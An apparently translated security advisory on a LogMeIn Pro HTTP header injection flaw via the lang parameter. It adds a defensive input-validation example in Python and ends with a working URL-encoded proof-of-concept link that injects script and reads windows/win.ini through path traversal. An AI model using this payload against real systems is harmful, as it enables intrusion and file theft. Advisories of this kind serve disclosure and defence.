LogMeIn cfgadvanced.html Page HTTP Header Injection Vulnerability

2009-06-09T00:00:00
ID SSV:11547
Type seebug
Reporter Root
Modified 2009-06-09T00:00:00

Description

BUGTRAQ ID: 35236

LogMeIn is popular remote access software that allows computers to be controlled over the network.

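The cfgadvanced.html page of LogMeIn has an HTTP header injection vulnerability. If a user is tricked into following a malicious link that carries a lang parameter, LogMeIn stores the lang parameter value in the [HKEY_LOCAL_MACHINE\SOFTWARE\LogMeIn\V5\Appearance\Language] registry entry and uses it in the Content-Language header each time a link is clicked, so a specially crafted parameter may lead to injection and execution of arbitrary code.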
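The root cause described above is a request parameter that is stored and later written into a response header without validation. The following is an added example, not LogMeIn's code: it validates the lang value against an allow-list both before storage and again when the Content-Language header is built. The function names, the allow-list pattern, the fallback value "en" and the sample URLs are assumptions made for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Allow-list for a plain language tag such as "en" or "en-US".
# Assumption: the UI only needs language[-region], a subset of BCP 47.
LANG_TAG = re.compile(r"[A-Za-z]{2,3}(?:-[A-Za-z0-9]{2,8})?")
DEFAULT_LANG = "en"  # assumed fallback

# Constructed sample requests (not captured traffic).
GOOD_URL = "https://localhost:2002/cfgadvanced.html?op=update&lang=en-US"
BAD_URL = "https://localhost:2002/cfgadvanced.html?op=update&lang=en-US%0D%0A%0D%0Atest"


def sanitize_lang(value):
    """Return value only if it is a plain language tag, else the default."""
    # fullmatch() must consume the whole string, so a trailing CR or LF
    # (which a pattern ending in "$" would tolerate) is rejected.
    if value is not None and LANG_TAG.fullmatch(value):
        return value
    return DEFAULT_LANG


def lang_from_url(url):
    """Validate the lang parameter before it is stored anywhere."""
    query = parse_qs(urlsplit(url).query, keep_blank_values=True)
    values = query.get("lang", [])
    # parse_qs percent-decodes, so %0D%0A arrives here as real CR LF.
    # A repeated lang parameter is treated as invalid as well.
    return sanitize_lang(values[0] if len(values) == 1 else None)


def content_language_header(stored_value):
    """Build the header line, re-validating the stored value on output."""
    # The store (here: a registry value) may already hold a bad value
    # written before the input check existed, so validate again.
    return "Content-Language: " + sanitize_lang(stored_value) + "\r\n"


if __name__ == "__main__":
    for url in (GOOD_URL, BAD_URL):
        print(repr(content_language_header(lang_from_url(url))))
```

Validating on output as well as on input matters here because the value is persisted: a value written before the fix would otherwise keep being emitted in the header.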

LogMeIn Pro 4.0.784

Vendor patch:

LogMeIn, Inc.

The vendor has not yet provided a patch or upgrade. We recommend that users of this software watch the vendor's home page for the latest version:

https://secure.logmein.com/home.asp?lang=en

                                        
                                            
                                                https://localhost:2002/cfgadvanced.html?op=update&amp;DisconnectExisting=1&amp;NoHttpCompr=1&amp;CrashDumpInfo=0&amp;lang=en-US%0D%0A%0D%0A%3Chtml%3E%3Cbody%3E%3C/body%3E%3CSCRIPT%3Evar%20ifr%3Dnull%3Bfunction%20al%28%29%7Bvar%20str%3D%28window.frames%5B0%5D.document.body.innerHTML%20%7C%7C%20ifr.contentDocument.documentElement.innerHTML%29%3Balert%28str.substring%28%28str.toLowerCase%28%29%29.indexOf%28%22%3Clegend%3E%22%2C400%29%29%29%3B%7D%20if%28window.location.href.match%28/.*cfgad.*/%29%29%7Bifr%3Ddocument.createElement%28%22iframe%22%29%3Bifr.src%3D%22https%3A//localhost%3A2002/logs.html%3Flog%3D../../../windows/win.ini%22%3Bdocument.body.appendChild%28ifr%29%3BsetTimeout%28%22al%28%29%22%2C4000%29%3B%7D%3C/script%3E%3C%21--